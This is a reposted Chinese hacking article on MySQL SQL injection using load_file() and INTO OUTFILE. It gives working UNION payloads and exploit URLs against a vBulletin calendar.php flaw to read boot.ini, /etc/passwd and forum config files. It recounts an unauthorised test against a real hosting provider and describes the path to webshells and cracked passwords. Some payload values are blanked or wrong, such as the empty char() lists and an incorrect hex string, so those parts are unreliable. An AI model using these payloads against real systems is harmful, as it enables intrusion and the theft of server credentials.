位置: 编程技术 - 正文

Advanced SQL Injection with MySQL

编辑:rootadmin

文/图 安全天使·angel[BST]

前言

  我的《SQL Injection with MySQL》(《黑客防线》7月的专题)已经对MySQL的注入有了比较全面的介绍了,但是有一个危害相当大的函数,我并没有在文中提及,因为如果能灵活应用这个函数,那PHP甚至服务器的安全性均会大打折扣,由于《SQL Injection with MySQL》的发表时间是在暑假期间,考虑到很多新手、学生和品德败坏的人乱用,所以我并没有把这个写在该文里,其实本文在5月初已写完。专题发表后,很多人已经陆续转到PHP+MYSQL注入的研究,很多新技术将会陆续挖掘出来,我们所掌握这方面未公开的高级技巧也会陆续公布出来。至于比较基础的东西,本文就不再提了。

详细

  我们知道,在SQL语句中,可以使用各种MySQL内置的函数,经常使用的就是DATABASE()、USER()、SYSTEM_USER()、SESSION_USER()、CURRENT_USER()这些函数来获取一些系统的信息,还有一个应用得比较多的函数,就是load_file(),该函数的作用是读入文件,并将文件内容作为一个字符串返回。  看到这里,应该可以想到我们可以做什么了,就是读取一些机密文件,但是也是有条件限制的:

欲读取文件必须在服务器上 必须指定文件完整的路径 必须有权限读取并且文件必须完全可读 欲读取文件必须小于 max_allowed_packet

  如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限,在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到只有administrators才能访问的文件,users就别想load_file出来。

  在实际的注入中,我们有两个难点需要解决:

绝对物理路径 构造有效的畸形语句

  在很多PHP程序中,当提交一个错误的Query,如果display_errors = on,程序就会暴露WEB目录的绝对路径,只要知道路径,那么对于一个可以注入的PHP程序来说,整个服务器的安全将受到严重的威胁。构造语句已经是小意思了。

利用

  我们假设一个程序的SQL语句如下:

SELECT * FROM article WHERE articleid=$id

  注:当前条件:magic_quotes_gpc = off,c:/boot.ini可读。

  此时,我们构造$id为:

-1 union select 1,1,1,1,load_file('c:/boot.ini')

  我们的Query就变成:

SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')

  程序会把c:/boot.ini内容老老实实显示出来,但是现在magic_quotes_gpc = off的主机少之又少,怎么才能构造出没有引号的语句呢?看过《SQL Injection with MySQL》的朋友肯定知道用char()函数或者把字符转换成进制,没错,就是它们。

  注:当前条件:magic_quotes_gpc = on,c:/boot.ini可读。

  我们构造$id为:

-1 union select 1,1,1,load_file(char(, , , , , , , , , , ))

  “char(,,,,,,,,,,)”就是“c:/boot.ini”的ASCII代码,我们的Query就变成:

SELECT * FROM article WHERE articleid=-1 union select 1, 1, 1, load_file(char(, , , , , , , , , , ))

  我们也可以成功的读取boot.ini文件,还有把字符串转换为进制的,“c:/boot.ini”的进制是“0xa2ff6fee”,所以上面的语句可以是这样:

SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(0xa2ff6fee)

  比较短了,看各人喜好了,大家可以在phpmyadmin或mysql>下输入以下查询慢慢研究。

SELECT load_file([string])

  当然,在实际应用中,由于种种条件限制,文件的内容未必会显示出来,我们也可以用into outfile把文件导出。大家已经知道如何利用了,我也不说细节了,看一个实例说明一切。

实例

  www.***host.cn是我国著名的FreeBSD主机提供商,我们就拿他来测试,因为它的论坛采用的是calendar.php存在问题的VBB论坛,我就不需要到处去找有漏洞的站点了(虽然到处都是)。这是一次完整的安全测试。仅仅获取信息,我并未进入服务器。

  这里补充说明一点关于VBB的根目录下global.php的一段代码,如下:

<?php // get rid of slashes in get / post / cookie data function stripslashesarray (&$arr) { while (list($key,$val)=each($arr)) { if ($key!="templatesused" and $key!="argc" and $key!="argv") { if (is_string($val) AND (strtoupper($key)!=$key OR ("".intval($key)=="$key"))) { $arr["$key"] = stripslashes($val); } else if (is_array($val) AND ($key == 'HTTP_POST_VARS' OR $key == 'HTTP_GET_VARS' OR strtoupper($key)!=$key)) { $arr["$key"] = stripslashesarray($val); } } } return $arr; } if (get_magic_quotes_gpc() and is_array($GLOBALS)) { if (isset($attachment)) { $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']); } if (isset($avatarfile)) { $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']); } $GLOBALS = stripslashesarray($GLOBALS); } set_magic_quotes_runtime(0); ?>

  这段代码的作用就是如果magic_quotes_gpc打开,就去掉所有特殊字符的前面的转义字符,所以,不管php.ini里magic_quotes_gpc的状态如何,我们输入的单引号都没有影响的,大家可以放心注入。呵呵。

  我们知道,提交:

/calendar.php?action=edit&eventid=1 UNION SELECT 1, 1, 1, 1, username, password FROM user WHERE userid=1

  是可以获取用户名和密码MD5散列的,但是由于特殊原因,并没有显示出来,但凭我的经验,知道并没有构造错,所以我们可以读取并导出成文件。  因为事先我无意中访问到了含有phpinfo()的文件,所以知道了WEB的绝对路径,从访问站点的结果,发现一个下载系统是生成HTML文件的,如果那个目录没有可写权限,是不能生成HTML文件的,不过这一切都不是本文的重点,我们现在掌握如下信息:

WEB绝对路径:/home/4ngel 可写目录路径:/home/4ngel/soft/ magic_quotes_gpc = on

  和主机root相比,论坛的admin根本就不算什么,我对论坛admin也不感兴趣,我们要读取论坛的配置文件还有/etc/passwd,知道MySQL的连接信息,可以从这里入手,写webshell或其他的东西,知道/etc/passwd我们可以跑密码。直接从ssh上去。

  VBB论坛的配置文件在/home/4ngel/forum/admin/config.php,转换成ASCII代码,提交:

calendar.php?action=edit&eventid=1 UNION SELECT 1, 1, 1, 1, 1, load_file(char(, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , )) FROM user WHERE userid=1 into outfile '/home/4ngel/soft/cfg.txt'

  呵呵,记得加一个where来定一个条件,否则如果论坛用户很多,那么导出的文件会相当大。或者干脆指定$eventid为一个不存在的值,就不用where了,就像这样:

calendar.php?action=edit&eventid=-1 UNION SELECT 1, 1, 1, 1, 1, load_file(char(, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , )) FROM user into outfile '/home/4ngel/soft/cfg.txt'

  /etc/passwd转换成ASCII代码,提交:

calendar.php?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1, load_file (char(, , , , , , , , , , )) FROM user into outfile '/home/4ngel/soft/etcpwd.txt'

  注意看到论坛的顶部,会出现下面的错误提示:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line

  经验告诉我们,文件导出成功了,提交:

  内容哗啦啦的出来了,而黑夜和猪蛋的他们入侵灰色的时候,一个个显示密码,欺骗,登陆后台,上传后门,读取config.php,一连串的步骤,我一个load_file()就搞定了。是不是危害很大?如图:

推荐整理分享Advanced SQL Injection with MySQL,希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

Advanced SQL Injection with MySQL

  我记得在某个群里讨论到大家都是通过搞9****.net这个站,而进入黑白服务器的,没有办法对黑白横冲直闯,只得来曲线的。用load_file()函数,知道了某些信息就可以进入黑白所在的服务器,过程和上面的一样,利用show.php的漏洞,直接load_file出程序的配置文件,知道了mysql的信息,远程连接,写数据库导出文件,很容易获得服务器admin。

后记

  由于危害太大,我一直都不太敢发布,相信国内也有人知道的。只是不公开而已。经过再三考虑还是决定发布了,希望大家掌握了以后,不要对国内的站点做任何具有破坏性的操作。谢谢合作!

ADODB 入门第1/2页 1.前言ADODB是ActiveDataObjectsDataBase的简称,它是一种PHP存取数据库的函式组件。现在SFS3系统(校园自由软件交流网学务系统)计划的主持人陈莹光老师,决

MySQL 数据库函数库 本函数库供存取MySQL数据库。有关MySQL的细节,及下载MySQL数据库,请到这个网址

使用distinct在mysql中查询多条不重复记录值的解决办法 在使用mysql时,有时需要查询出某个字段不重复的记录,虽然mysql提供有distinct这个关键字来过滤掉多余的重复记录只保留一条,但往往只用它来返回不

标签: Advanced SQL Injection with MySQL

本文链接地址:https://www.jiuchutong.com/biancheng/319832.html 转载请保留说明!

上一篇:MySQL 索引分析和优化(mysql索引之间的区别)

下一篇:MySQL 数据库函数库(mysql数据库函数)

  • 支付境外劳务费需要缴纳哪些税费
  • 电动三轮车发票和合格证丢了怎么上牌照
  • 手机里面的发票在哪里
  • 收益性支出包括哪些内容
  • 应付款为什么是负数
  • 即征即退如何申报增值税
  • 收到投资款怎么做账
  • 银行存款可以红字吗
  • 劳务报酬和工资薪金哪个税率高
  • 货物丢失计入什么费用
  • 非独立核算的分公司怎么做账
  • 企业所得税季报弥补以前年度亏损怎么填
  • 进项票已认证忘记开票
  • 维护费可以留到明年抵扣吗?
  • 广告制作费属于现代服务吗
  • 个体工商户在税法规定的享有免税优惠的期限内
  • 小微企业声明函怎么开
  • 劳务派遣一般纳税人可以简易征收吗
  • 调减管理费用如何调整本年利润
  • 委托贷款合同效力
  • 运输途中发生货物丢失
  • 社保基数如何计算单位和个人承担多少
  • 已开票不确认收入未收款怎么做账
  • 电信猫光信号灯不亮
  • 关闭固定在任务栏的功能
  • 初学者如何
  • fs209e是什么意思
  • php array_pop函数
  • 出租不动产增值税纳税义务发生时间
  • 会计的四大基本要素
  • 若依前后端分离做的系统
  • thinkphp 多数据库
  • VUE -- defineExpose
  • 米苏拉塔是哪个国家
  • 大西洋,一望无际的海面
  • php中session使用
  • GPT-4:关于下一代人工智能模型的事实、谣言和期望
  • php添加背景怎么实现
  • 会计调整以前年度遗留问题查不出来说明怎么写
  • 城镇土地使用税减免税政策2023年
  • 管理费用明细账余额累加吗
  • mysql常见报错
  • 其他收益包含
  • 商业承兑贴现几个点
  • 房地产材料采购清单
  • 企业其他业务收入要交税吗
  • 税务上减免两费是什么
  • 何为居民企业
  • 增值税及附加税计算公式
  • 政府专项基金属于什么类
  • 什么是调表不调账
  • 收到定期存款怎么做分录
  • 债券分期付息到期还本的意思
  • 应收账款多收了退回怎么做账
  • 滞留专票会有什么风险
  • mysql动态sql语句赋值
  • mssql数据库的账号密码
  • mysql 查找
  • win8.1还原系统
  • ubuntu16.04安装拼音输入法
  • 要建立linux分区可以有哪几种方法
  • xp系统怎么把ie浏览器放到桌面
  • iphone中的照片如何导入mac
  • executor进程
  • driver's
  • centos7添加桌面图标
  • win10不兼容游戏名单
  • opengl es2.0
  • u3d手游开发
  • 使用jquery操作dom
  • 安卓字库ic
  • 怎么查看u盘有没有传输过数据
  • 安卓view事件分发
  • unityui
  • xmpp client
  • Python中的def
  • 1988年中华人民共和国印花税票五元
  • 环保税要求标注什么
  • 汽车发票含税吗
  • 工本费每月都扣?
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设